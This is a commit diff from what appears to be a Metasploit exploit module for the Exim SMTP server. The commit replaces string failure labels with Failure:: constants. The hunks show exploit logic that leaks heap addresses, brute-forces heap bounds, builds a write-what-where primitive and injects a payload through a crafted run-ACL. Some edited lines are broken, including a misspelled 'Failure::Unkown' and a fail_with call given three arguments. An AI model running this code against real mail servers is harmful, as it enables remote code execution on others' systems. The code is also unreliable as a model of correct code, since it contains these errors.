moar fail_with's
Christian Mehlmauer
parent
4dc402fd3c
commit
a193ae42b0
|
|
@ -235,8 +235,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
break if done
|
||||
end
|
||||
|
||||
fail_with("infoleak", "not vuln? old glibc? (no leaked_arch)") if leaked_arch.nil?
|
||||
fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr.empty?
|
||||
fail_with(Failure::NotVulnerable, "not vuln? old glibc? (no leaked_arch)") if leaked_arch.nil?
|
||||
fail_with(Failure::NotVulnerable, "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr.empty?
|
||||
|
||||
leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }
|
||||
leaked_addr = leaked_addr.first # longest
|
||||
|
|
@ -250,7 +250,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
# leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:
|
||||
leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE
|
||||
fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr <= MMAP_MIN_ADDR
|
||||
fail_with(Failure::NoTarget, "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr <= MMAP_MIN_ADDR
|
||||
|
||||
print_good("Successfully leaked_arch: #{leaked_arch}")
|
||||
print_good("Successfully leaked_addr: #{leaked_addr.to_s(16)}")
|
||||
|
|
@ -258,10 +258,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def try_information_leak(heap_shift, write_offset, last_digit = 9)
|
||||
fail_with("infoleak", "heap_shift") if (heap_shift < MIN_HEAP_SHIFT)
|
||||
fail_with("infoleak", "heap_shift") if (heap_shift & 15) != 0
|
||||
fail_with("infoleak", "write_offset") if (write_offset & 7) != 0
|
||||
fail_with("infoleak", "last_digit") if "#{last_digit}" !~ /\A[0-9]\z/
|
||||
fail_with(Failure::BadConfig, "heap_shift") if (heap_shift < MIN_HEAP_SHIFT)
|
||||
fail_with(Failure::BadConfig, "heap_shift") if (heap_shift & 15) != 0
|
||||
fail_with(Failure::BadConfig, "write_offset") if (write_offset & 7) != 0
|
||||
fail_with(Failure::BadConfig, "last_digit") if "#{last_digit}" !~ /\A[0-9]\z/
|
||||
|
||||
smtp_connect
|
||||
|
||||
|
|
@ -338,8 +338,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
# DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure
|
||||
# that rogue child processes cannot use them.
|
||||
|
||||
fail_with("codeexec", "encoded payload") if payload.raw != payload.encoded
|
||||
fail_with("codeexec", "invalid payload") if payload.raw.empty? or payload.raw.count("^\x20-\x7E").nonzero?
|
||||
fail_with(Failure::BadConfig, "encoded payload") if payload.raw != payload.encoded
|
||||
fail_with(Failure::BadConfig, "invalid payload") if payload.raw.empty? or payload.raw.count("^\x20-\x7E").nonzero?
|
||||
# Exim processes our run-ACL with expand_string() first (hence the [\$\{\}\\] escapes),
|
||||
# and transport_set_up_command(), string_dequote() next (hence the [\"\\] escapes).
|
||||
encoded = payload.raw.gsub(/[\"\\]/, '\\\\\\&').gsub(/[\$\{\}\\]/, '\\\\\\&')
|
||||
|
|
@ -425,12 +425,12 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
if not min_heap_addr
|
||||
if reply
|
||||
fail_with("codeexec", "no min_heap_addr") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE
|
||||
fail_with(Failure::BadConfig, "no min_heap_addr") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE
|
||||
survived = heap_addr
|
||||
else
|
||||
if ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE
|
||||
# survived should point to our safe-zone at the beginning of the heap
|
||||
fail_with("codeexec", "never survived") if not survived
|
||||
fail_with(Failure::UnexpectedReply, "never survived") if not survived
|
||||
print_good "Brute-forced min_heap_addr: #{survived.to_s(16)}"
|
||||
min_heap_addr = survived
|
||||
end
|
||||
|
|
@ -451,13 +451,13 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
# ^ otherwise the 3 copies of sender_helo_name will
|
||||
# fit into the current_block of POOL_PERM memory
|
||||
end
|
||||
fail_with("codeexec", "Brute-force FAILURE")
|
||||
fail_with(Failure::UnexpectedReply, "Brute-force FAILURE")
|
||||
end
|
||||
|
||||
# our write-what-where primitive
|
||||
def try_code_execution(len, what, where)
|
||||
fail_with("codeexec", "#{what.length} >= #{len}") if what.length >= len
|
||||
fail_with("codeexec", "#{where} < 0") if where < 0
|
||||
fail_with(Failure::UnexpectedReply, "#{what.length} >= #{len}") if what.length >= len
|
||||
fail_with(Failure::UnexpectedReply, "#{where} < 0") if where < 0
|
||||
|
||||
x86 = (@leaked[:arch] == ARCH_X86)
|
||||
min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE))
|
||||
|
|
@ -543,10 +543,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
DOT = '[.]'
|
||||
|
||||
def smtp_connect(exploiting = true)
|
||||
fail_with("smtp_connect", "sock isn't nil") if sock
|
||||
fail_with(Failure::Unknown, "sock isn't nil") if sock
|
||||
|
||||
connect
|
||||
fail_with("smtp_connect", "sock is nil") if not sock
|
||||
fail_with(Failure::Unkown, "sock is nil") if not sock
|
||||
@smtp_state = :recv
|
||||
|
||||
# Receiving the banner (but we don't really need to check it)
|
||||
|
|
@ -555,8 +555,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
sender_host_address = datastore['SENDER_HOST_ADDRESS']
|
||||
if sender_host_address !~ /\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\z/
|
||||
fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (nil)") if sender_host_address.nil?
|
||||
fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)")
|
||||
fail_with(Failure::BadConfig, "bad SENDER_HOST_ADDRESS (nil)") if sender_host_address.nil?
|
||||
fail_with(Failure::BadConfig, "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)")
|
||||
end
|
||||
sender_host_address_octal = "0" + $1.to_i.to_s(8) + ".#{$2}.#{$3}.#{$4}"
|
||||
|
||||
|
|
@ -567,12 +567,12 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
reply = smtp_recv(HELO_CODES)
|
||||
|
||||
if reply[:code] != "250"
|
||||
fail_with("smtp_connect", "not Exim?") if reply[:lines].first !~ /argument does not match calling host/
|
||||
fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (helo_verify_hosts)")
|
||||
fail_with(Failure::NoTarget, "not Exim?") if reply[:lines].first !~ /argument does not match calling host/
|
||||
fail_with(Failure::BadConfig, "bad SENDER_HOST_ADDRESS (helo_verify_hosts)")
|
||||
end
|
||||
|
||||
if reply[:lines].first =~ /\A250 (\S*) Hello (.*) \[(\S*)\]\r\n\z/mn
|
||||
fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)") if sender_host_address != $3
|
||||
fail_with(Failure::BadConfig, "bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)") if sender_host_address != $3
|
||||
smtp_active_hostname = $1
|
||||
sender_host_name = $2
|
||||
|
||||
|
|
@ -582,11 +582,11 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
else
|
||||
sender_ident = nil
|
||||
end
|
||||
fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (no FCrDNS)") if sender_host_name == sender_host_address_octal
|
||||
fail_with(Failure::BadConfig, "bad SENDER_HOST_ADDRESS (no FCrDNS)") if sender_host_name == sender_host_address_octal
|
||||
|
||||
else
|
||||
# can't double-check sender_host_address here, so only for advanced users
|
||||
fail_with("smtp_connect", "user-supplied EHLO greeting") unless datastore['FORCE_EXPLOIT']
|
||||
fail_with(Failure::BadConfig, "user-supplied EHLO greeting") unless datastore['FORCE_EXPLOIT']
|
||||
# worst-case scenario
|
||||
smtp_active_hostname = "A" * NS_MAXDNAME
|
||||
sender_host_name = "A" * NS_MAXDNAME
|
||||
|
|
@ -601,7 +601,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
ident: sender_ident,
|
||||
__smtp_active_hostname: smtp_active_hostname
|
||||
}
|
||||
fail_with("smtp_connect", "sender changed") if _sender and _sender != @sender
|
||||
fail_with(Failure::BadConfig, "sender changed") if _sender and _sender != @sender
|
||||
|
||||
# avoid a future pathological case by forcing it now:
|
||||
# "Do NOT free the first successor, if our current block has less than 256 bytes left."
|
||||
|
|
@ -613,18 +613,18 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)
|
||||
fail_with("smtp_send", "state is #{@smtp_state}") if @smtp_state != :send
|
||||
fail_with(Failure::BadConfig, "state is #{@smtp_state}") if @smtp_state != :send
|
||||
@smtp_state = :sending
|
||||
|
||||
if not arg_pattern
|
||||
fail_with("smtp_send", "prefix is nil") if not prefix
|
||||
fail_with("smtp_send", "param isn't nil") if arg_prefix or arg_suffix or suffix or arg_length
|
||||
fail_with(Failure::BadConfig, "prefix is nil") if not prefix
|
||||
fail_with(Failure::BadConfig, "param isn't nil") if arg_prefix or arg_suffix or suffix or arg_length
|
||||
command = prefix
|
||||
|
||||
else
|
||||
fail_with("smtp_send", "param is nil") unless prefix and arg_prefix and arg_suffix and suffix and arg_length
|
||||
fail_with(Failure::BadConfig, "param is nil") unless prefix and arg_prefix and arg_suffix and suffix and arg_length
|
||||
length = arg_length - arg_prefix.length - arg_suffix.length
|
||||
fail_with("smtp_send", "len is #{length}") if length <= 0
|
||||
fail_with(Failure::BadConfig, "smtp_send", "len is #{length}") if length <= 0
|
||||
argument = arg_prefix
|
||||
case arg_pattern
|
||||
when String
|
||||
|
|
@ -634,12 +634,12 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
argument += arg_pattern.call(length)
|
||||
end
|
||||
argument += arg_suffix
|
||||
fail_with("smtp_send", "arglen is #{argument.length}, not #{arg_length}") if argument.length != arg_length
|
||||
fail_with(Failure::BadConfig, "arglen is #{argument.length}, not #{arg_length}") if argument.length != arg_length
|
||||
command = prefix + argument + suffix
|
||||
end
|
||||
|
||||
fail_with("smtp_send", "invalid char in cmd") if command.count("^\x20-\x7F") > 0
|
||||
fail_with("smtp_send", "cmdlen is #{command.length}") if command.length > SMTP_CMD_BUFFER_SIZE
|
||||
fail_with(Failure::BadConfig, "invalid char in cmd") if command.count("^\x20-\x7F") > 0
|
||||
fail_with(Failure::BadConfig, "cmdlen is #{command.length}") if command.length > SMTP_CMD_BUFFER_SIZE
|
||||
command += "\n" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer
|
||||
|
||||
# the following loop works around a bug in the put() method:
|
||||
|
|
@ -648,8 +648,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
while command and not command.empty?
|
||||
num_sent = sock.put(command)
|
||||
fail_with("smtp_send", "sent is #{num_sent}") if num_sent <= 0
|
||||
fail_with("smtp_send", "sent is #{num_sent}, greater than #{command.length}") if num_sent > command.length
|
||||
fail_with(Failure::BadConfig, "sent is #{num_sent}") if num_sent <= 0
|
||||
fail_with(Failure::BadConfig, "sent is #{num_sent}, greater than #{command.length}") if num_sent > command.length
|
||||
command = command[num_sent..-1]
|
||||
end
|
||||
|
||||
|
|
@ -657,7 +657,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def smtp_recv(expected_code = nil, expected_data = nil)
|
||||
fail_with("smtp_recv", "state is #{@smtp_state}") if @smtp_state != :recv
|
||||
fail_with(Failure::BadConfig, "state is #{@smtp_state}") if @smtp_state != :recv
|
||||
@smtp_state = :recving
|
||||
|
||||
failure = catch(:failure) do
|
||||
|
|
@ -713,13 +713,13 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
return reply
|
||||
end
|
||||
|
||||
fail_with("smtp_recv", "#{failure}") if expected_code
|
||||
fail_with(Failure::UnexpectedReply, "#{failure}") if expected_code
|
||||
return nil
|
||||
end
|
||||
|
||||
def smtp_disconnect
|
||||
disconnect if sock
|
||||
fail_with("smtp_disconnect", "sock isn't nil") if sock
|
||||
fail_with(Failure::Unknown, "sock isn't nil") if sock
|
||||
@smtp_state = :disconnected
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue